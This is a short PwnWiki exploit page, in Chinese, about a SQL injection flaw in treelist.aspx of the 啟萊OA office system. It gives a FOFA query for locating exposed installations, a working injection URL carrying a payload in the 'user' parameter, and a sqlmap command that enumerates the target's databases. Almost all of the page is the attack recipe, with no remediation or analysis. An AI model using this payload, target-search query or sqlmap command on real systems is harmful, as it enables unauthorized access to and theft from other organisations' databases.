啟萊OA treelist.aspx SQL注入漏洞

From PwnWiki

FOFA

app="启莱OA"

存在SQL注入的文件為 treelist.aspx 

http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1


SQLMAP

sqlmap -u "http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1" -p users --dbs
Retrieved from "https://pwnwiki.com/index.php?title=啟萊OA_treelist.aspx_SQL注入漏洞&oldid=3003"